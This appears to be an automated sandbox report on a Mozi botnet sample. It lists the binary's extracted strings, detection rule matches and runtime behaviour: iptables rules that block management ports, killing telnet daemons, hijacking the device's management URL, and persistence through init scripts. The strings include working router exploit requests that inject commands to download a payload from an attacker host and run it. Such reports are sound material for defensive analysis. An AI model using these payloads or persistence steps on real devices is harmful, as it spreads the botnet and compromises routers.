                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: Initial samplePotential command found: rm /home/httpd/web_shell_cmd.gch
                Source: Initial samplePotential command found: echo 3 > /usr/local/ct/ctadmincfg
                Source: Initial samplePotential command found: mount -o remount,rw /overlay /
                Source: Initial samplePotential command found: mv -f %s %s
                Source: Initial samplePotential command found: iptables -I INPUT -p udp --destination-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I INPUT -p udp --dport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I OUTPUT -p udp --sport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
                Source: Initial samplePotential command found: GET /c
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
                Source: Initial samplePotential command found: killall -9 %s
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 22 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 23 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 2323 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 22 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 23 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 22 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 23 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 2323 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 22 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 23 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 2323 -j DROP
                Source: Initial samplePotential command found: killall -9 telnetd utelnetd scfgmgr
                Source: Initial samplePotential command found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
                Source: Initial samplePotential command found: GET /Mozi.6 HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.7 HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.c HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.m HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.x HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.a HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.s HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.r HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.b HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.4 HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.k HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.l HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.p HTTP/1.0
                Source: Initial samplePotential command found: GET /%s HTTP/1.1
                Source: Initial samplePotential command found: POST /%s HTTP/1.1
                Source: Initial samplePotential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
                Source: Initial samplePotential command found: POST /picsdesc.xml HTTP/1.1
                Source: Initial samplePotential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: Initial samplePotential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                Source: Initial samplePotential command found: POST /UD/act?1 HTTP/1.1
                Source: Initial samplePotential command found: POST /HNAP1/ HTTP/1.0
                Source: Initial samplePotential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                Source: Initial samplePotential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                Source: Initial samplePotential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
                Source: Initial samplePotential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
                Source: Initial samplePotential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
                Source: ELF static info symbol of initial sample.symtab present: no
                Source: Mozi.m, type: SAMPLEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
                Source: /usr/networks, type: DROPPEDMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
                Source: classification engineClassification label: mal100.spre.troj.evad.linM@0/221@4/0

                Persistence and Installation Behavior:

                barindex
                Executes the "iptables" command to insert, remove and/or manipulate rulesShow sources
                Source: /bin/sh (PID: 4618)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4652)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4655)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4699)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4708)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4736)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4742)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4761)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4877)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: /bin/sh (PID: 4880)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: /bin/sh (PID: 4883)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: /bin/sh (PID: 4892)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: /bin/sh (PID: 4950)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: /bin/sh (PID: 4985)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: /bin/sh (PID: 5011)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: /bin/sh (PID: 5014)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: /bin/sh (PID: 5019)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: /bin/sh (PID: 5044)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: /bin/sh (PID: 5079)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: /bin/sh (PID: 5105)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: /bin/sh (PID: 5121)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: /bin/sh (PID: 5144)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: /bin/sh (PID: 5152)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: /bin/sh (PID: 5183)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: /bin/sh (PID: 5201)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5204)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5207)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5211)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5232)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5268)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5303)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5333)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 14165 -j ACCEPT
                Sample reads /proc/mounts (often used for finding a writable filesystem)Show sources
                Source: /tmp/Mozi.m (PID: 4580)File: /proc/4580/mountsJump to behavior
                Sample tries to persist itself using /etc/profileShow sources
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/profile.d/cedilla-portuguese.shJump to behavior
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/profile.d/apps-bin-path.shJump to behavior
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/profile.d/Z97-byobu.shJump to behavior
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/profile.d/bash_completion.shJump to behavior
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/profile.d/vte-2.91.shJump to behavior
                Sample tries to persist itself using System V runlevelsShow sources
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/rcS.d/S95baby.shJump to behavior
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/rc.localJump to behavior
                Terminates several processes with shell command 'killall'Show sources
                Source: /bin/sh (PID: 4584)Killall command executed: killall -9 telnetd utelnetd scfgmgr
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/230/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/231/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/232/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/233/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/234/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3512/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/359/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/1452/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3632/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3518/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/10/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/1339/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/11/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/12/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/13/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/14/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/15/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/16/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/17/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/18/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/19/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/483/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3527/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3527/cmdline
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/1/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/2/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3525/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/1346/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3524/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3524/cmdline
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/4/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3523/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/5/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/7/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/8/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/9/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/20/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/21/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/22/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/23/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/24/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/25/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/28/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/29/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/1363/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3541/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3541/cmdline
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/1362/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/496/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/496/cmdline
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/30/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/31/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/31/cmdline
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/1119/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3790/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3791/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3310/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3431/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3431/cmdline
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3550/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/260/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/263/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/264/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/385/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/144/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/386/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/145/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/146/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3546/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3546/cmdline
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/147/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3303/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3545/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/148/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/149/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3543/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/822/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/822/cmdline
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3308/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3308/cmdline
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3429/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3429/cmdline
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/47/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/48/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/48/cmdline
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/49/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/150/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/271/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/151/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/152/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/153/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/395/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/396/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/154/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/155/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/156/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/1017/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/157/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/158/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/159/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3432/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3432/cmdline
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/50/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/51/stat
                Source: /tmp/Mozi.m (PID: 4582)Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
                Source: /tmp/Mozi.m (PID: 4616)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 56870 -j ACCEPT"
                Source: /tmp/Mozi.m (PID: 4650)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 56870 -j ACCEPT"
                Source: /tmp/Mozi.m (PID: 4653)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 56870 -j ACCEPT"
                Source: /tmp/Mozi.m (PID: 4689)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 56870 -j ACCEPT"
                Source: /tmp/Mozi.m (PID: 4702)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 56870 -j ACCEPT"
                Source: /tmp/Mozi.m (PID: 4728)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 56870 -j ACCEPT"
                Source: /tmp/Mozi.m (PID: 4739)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 56870 -j ACCEPT"
                Source: /tmp/Mozi.m (PID: 4750)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 56870 -j ACCEPT"
                Source: /tmp/Mozi.m (PID: 4875)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
                Source: /tmp/Mozi.m (PID: 4878)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
                Source: /tmp/Mozi.m (PID: 4881)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
                Source: /tmp/Mozi.m (PID: 4885)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
                Source: /tmp/Mozi.m (PID: 4912)Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
                Source: /tmp/Mozi.m (PID: 4925)Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
                Source: /tmp/Mozi.m (PID: 4940)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
                Source: /tmp/Mozi.m (PID: 4975)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
                Source: /tmp/Mozi.m (PID: 5005)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
                Source: /tmp/Mozi.m (PID: 5012)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
                Source: /tmp/Mozi.m (PID: 5015)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
                Source: /tmp/Mozi.m (PID: 5035)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
                Source: /tmp/Mozi.m (PID: 5069)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
                Source: /tmp/Mozi.m (PID: 5097)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
                Source: /tmp/Mozi.m (PID: 5112)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
                Source: /tmp/Mozi.m (PID: 5139)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
                Source: /tmp/Mozi.m (PID: 5146)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
                Source: /tmp/Mozi.m (PID: 5169)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
                Source: /tmp/Mozi.m (PID: 5199)Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 14165 -j ACCEPT"
                Source: /tmp/Mozi.m (PID: 5202)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 14165 -j ACCEPT"
                Source: /tmp/Mozi.m (PID: 5205)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 14165 -j ACCEPT"
                Source: /tmp/Mozi.m (PID: 5208)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 14165 -j ACCEPT"
                Source: /tmp/Mozi.m (PID: 5220)Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 14165 -j ACCEPT"
                Source: /tmp/Mozi.m (PID: 5254)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 14165 -j ACCEPT"
                Source: /tmp/Mozi.m (PID: 5290)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 14165 -j ACCEPT"
                Source: /tmp/Mozi.m (PID: 5326)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 14165 -j ACCEPT"
                Source: /bin/sh (PID: 4618)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4652)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4655)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4699)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4708)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4736)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4742)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4761)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4877)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: /bin/sh (PID: 4880)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: /bin/sh (PID: 4883)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: /bin/sh (PID: 4892)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: /bin/sh (PID: 4950)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: /bin/sh (PID: 4985)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: /bin/sh (PID: 5011)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: /bin/sh (PID: 5014)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: /bin/sh (PID: 5019)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: /bin/sh (PID: 5044)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: /bin/sh (PID: 5079)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: /bin/sh (PID: 5105)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: /bin/sh (PID: 5121)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: /bin/sh (PID: 5144)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: /bin/sh (PID: 5152)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: /bin/sh (PID: 5183)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: /bin/sh (PID: 5201)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5204)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5207)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5211)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5232)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5268)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5303)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5333)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 14165 -j ACCEPT
                Source: /tmp/Mozi.m (PID: 4607)Reads from proc file: /proc/statJump to behavior
                Source: /tmp/Mozi.m (PID: 4580)File: /usr/networks (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /tmp/Mozi.m (PID: 4580)File written: /usr/networksJump to dropped file
                Source: /tmp/Mozi.m (PID: 4580)Shell script file created: /etc/rcS.d/S95baby.shJump to dropped file
                Source: /tmp/Mozi.m (PID: 4580)Shell script file created: /etc/init.d/S95baby.shJump to dropped file
